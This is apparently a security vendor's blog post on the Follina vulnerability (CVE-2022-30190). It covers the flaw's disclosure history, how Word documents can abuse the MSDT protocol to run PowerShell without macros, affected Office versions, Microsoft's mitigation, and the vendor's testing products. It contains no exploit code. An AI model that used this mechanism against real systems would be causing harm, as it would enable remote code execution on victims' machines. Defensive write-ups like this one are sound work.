CVE-2022-30190 (Follina): Exploiting MSDT via Macro-less Word Docs for RCE

By: Cymulate

Last Updated: December 12, 2024

Rated a 7.8 high CVSS 3.x severity base score, CVE-2022-30190 (Follina) takes advantage of the MSDT (Microsoft Support Diagnostic Tool), an official tool built into all versions of Windows. Though officially issued on May 30, 2022, CVE-2022-30190 was detected in the wild as early as April 2022. Microsoft ignored a warning from the Crazyman_Army research team, which identified a zero-day RCE vulnerability in one of their products. The vulnerability submission report, titled VULN-065524, was closed and incorrectly classified as “fixed.” Security researcher Nao_sec was credited for uncovering the vulnerability. It was discovered during a VirusTotal search for files leveraging CVE-2021-40444. CVE-2022-30190’s public disclosure occurred on May 27, 2022, followed by Microsoft’s publication of mitigation guidance on May 30, 2022.

How CVE-2022-30190 (Follina) Exploits MSDT

Anyone can access the Microsoft Support Diagnostic Tool (MSDT) from the Start Menu by typing “MSDT” in the search bar. The opening dialog requires a passkey, which is typically provided by a Microsoft support professional. This tool enables remote diagnostics via the ms-msdt:// protocol. Attackers exploit this protocol to execute PowerShell commands, opening the door for malicious actions such as:
  • Running malware.
  • Installing unauthorized programs.
  • Altering or deleting data.
  • Creating new accounts with the victim’s permissions.
The Follina vulnerability allows attackers to activate MSDT through .docx or .rtf documents, even without enabled macros or when files are opened in protected view. Worse, it also applies to .doc shared files.

Impacted Systems

CVE-2022-30190 has been confirmed in Office 2013, 2016, 2019, 2021, Office Pro Plus, and Office 365. As exploits leveraging it can be activated simply through the target opening a word document, any Network user is now a potential victim until the workarounds published by Microsoft Security Response Center have been applied and, most importantly, fully validated. 

Mitigation Steps Published by Microsoft

Microsoft guidance recommends disabling the MSDT URL protocol, effectively preventing attackers to take advantage of it for malicious purposes.  

Testing for CVE-2022-30190 Vulnerability

A PoC for locally testing for Follina Office RCE vulnerability can be found on Github   Follina RCE Usage Script   Which produces these results:    

Cymulate’s Response to Follina

By June 2, Cymulate users could access a dedicated purple team scenario to validate their defenses against CVE-2022-30190. An Immediate Threat Intelligence Kit for Follina was published on June 1, enabling users to test their environments. Additionally, Cymulate users can:
  • Update their SIEM signature bank with multiple IoCs.
  • Expand the breadth of purple team scenario validations to include Follina-specific exploits.
Cymulate's Immediate threat CVE-2022-30190 kit SIEM Follina Cymulate  

Validate Your Environment Today

Protect your organization by testing your exposure to CVE-2022-30190 with Cymulate’s comprehensive security validation tools. Start validating against this immediate threat now and ensure your defenses are resilient.
Subscribe